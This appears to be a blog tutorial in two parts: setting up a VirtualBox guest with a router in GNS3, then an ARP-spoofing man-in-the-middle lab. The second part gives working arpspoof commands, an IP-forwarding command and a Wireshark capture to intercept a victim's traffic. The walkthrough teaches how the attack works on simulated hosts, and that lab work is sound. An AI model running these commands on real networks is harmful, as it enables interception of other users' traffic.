Adding VirtualBox Guest to GNS3

Adding VirtualBox Guest to GNS3

1. Install GNS3 and VirtualBox

2. Add a 'Host-only Network' to VirtualBox Manager
File>Preferences>Network
Click the 'Add host only network' button (right side)
A 'vboxnet0' network appears in the list

3. Add a guest OS to VirtualBox

4. Add guestOS to host-only network
Right the newly added guestOS inthe VBox manager
Settings>Networks>Adapter1
Check 'Enable Network Adapter'
Select 'Host-only adapter' in 'Attached To:'
Select 'vboxnet0' in 'Name:'
Under 'Advanced' section uncheck 'Cable connected'
Note down the MAC address

5. Selecting VBoxwrapper in GNS3
GNS3 : Edit>Preferences>VirtualBox>General Settings>Path to VBoxwrapper
Locate the 'vboxwrapper.py' in the 'vboxwrapper/'
Click 'Test Settings'
If 'VBoxwrapper and VirtualBox API 4.1.2_Ubuntu have been successfully started' then its OK

6. Selecting the guestOS in GNS3
GNS3 : Edit>Preferences>VirtualBox>VirtualBox Guest
Click 'Refresh VM List'
From the 'VM List', select the guestOS and give it an 'Identifier name'
Click 'Save' , the Id Name appears in the list below 'Save'
Click 'Apply' and 'OK'

7. Adding VirtualBox guest to GNS3
Drag and drop 'VirtualBox guest' to the central panel

8. Adding Router to GNS3 and Setup an interface 
Drag and drop a Router from the left panel to the central panel
(Note: You should have loaded the particular Routers IOS image in GNS3
              See 'GNS3 non superuser setup' on how to add IOS images
)

9. Connecting Router and guestOS
Click 'Add a Link' and Select 'Ethernet'
In the central Panel, Left Click the Router and then guestOS (select an adapter if asked)
Click the '(X)' to stop adding links
A link appears between the guestOS and Router (in the central panel)
Red dots appear at both the ends of the links

10. Configuring the router 
Right and click 'Start' on the Router in the central panel
Red dot near the Router turns green
Right and click 'Console' the Router in the central panel
In the terminal window that appear
Wait for it to boot (press Enter when asked to get started)
( This not the best way to learn to configure a router.Refer some Cisco or CCNA materials.
     I learned it from CCNA book by Todd Lammle.
)

R3#configure terminal
R3(config)#interface ethernet 0/0
R3(config-if)#ip address 192.168.1.1 255.255.255.0
R3(config-if)#no shutdown
R3(config-if)# [[Ctrl+C]]
R3#copy running-config startup-config
[Enter]
[Enter]
R3#Exit

Close the terminal window

11. Configuring guestOS
Right and click 'Start' on the guestOS in the central panel
Red dot near the guestOS turns green
After booting, Login and start a terminal

guestOS# ifconfig -a
 from the list that appears find the ethernet number (eg : eth3) of the adapter whose 
 HWaddr is same as the MAC address we noted down in step 4.
guestOS# ifconfig eth3 192.168.1.2 up
 'eth3' is the adapter in my case, can be different in yours
guestOS# ping 192.168.1.1

if ping worked then SUCCESS
(Note : while building larger networks add default gateway as 192.168.1.1 to the guestOS's adapter)

12. Save the topology setup. 

ARP SPOOFING - VBox+GNS3 test

ARP SPOOFING - VBox+GNS3 test

Address Resolution Protocol (ARP) is a protocol used for resolution of network layer addresses (IP address) into link layer addresses (MAC address). ARP was defined by RFC 826 in 1982. It is a request and reply protocol and used only within the boundaries of a single network, never across internetwork nodes.

ARP works on Ethernet networks as follows : 
When any device wishes to send data to another target device over Ethernet, it must first determine the MAC address of that target given its IP address These IP-to-MAC address mappings are derived from an ARP cache maintained on each device. If the given IP address does not appear in a device's cache, that device cannot direct messages to that target until it obtains a new mapping. To do this, the initiating device first sends an ARP request broadcast message on the local subnet. The host with the given IP address sends an ARP reply in response to the broadcat, allowing the initiating device to update its cache and proceed to deliver messages directly to the target. ARP does not provide methods for authenticating ARP replies on a network, ARP replies can come from systems other than the one with the required Layer 2 address.

In ARP spoofing the answering system, or spoofer, replies to a request for another system's address with the aim of intercepting data bound for that system. A malicious user may use ARP spoofing to perform a man-in-the-middle or denial-of-service attack on other users on the network.

Here in this tutorial we are trying a man-in-the-middle attack where we send ARP reply to the router from the attacker stating that it is the victim.Also ARP reply is send to victim stating that the attacker is the router.

Setup a network with at least 2 host connected to a Ethernet switch. This switch is connected to a router. The network I used is shown below.

Network Simulation Software : GNS3

R1 :             Cisco 3620 Router| 192.168.1.1
BT5R2 :          BackTrack 5 R2 | 192.168.1.2 | MAC_ID_1 | Attacker
Mint 12 :             Linux Mint 12  | 192.168.1.3 | MAC_ID_2 | Victim

BT5R2
terminal#1 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.1 192.168.1.3 
This sends ARP reply to R1 stating that BT5R2 is 192.168.1.3
so R1 saves MAC_ID_1 as the MAC ID of 192.168.1.3
This is reply is send regularly so dont close this process

terminal#2 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.3 192.168.1.1
This sends ARP reply to Mint 12 stating that BT5R2 is 192.168.1.1
so Mint 12 saves MAC_ID_1 as the MAC ID of 192.168.1.1
This is reply is send regularly so dont close this process

terminal#3 @ BT5R2
BT5R2# echo 1 > /proc/sys/net/ipv4/ip_forward
Enable IP forwarding
BT5R2# wireshark & 
So that you can capture the packets for verification


Mint 12
Mint12# ping 192.168.1.1
ping R1, check wireshark @ BT5R2 for 'Redirect' packets.
Those packets will be highlighted in Black.

R1
To check R1 ARP mapping 
R1#show arp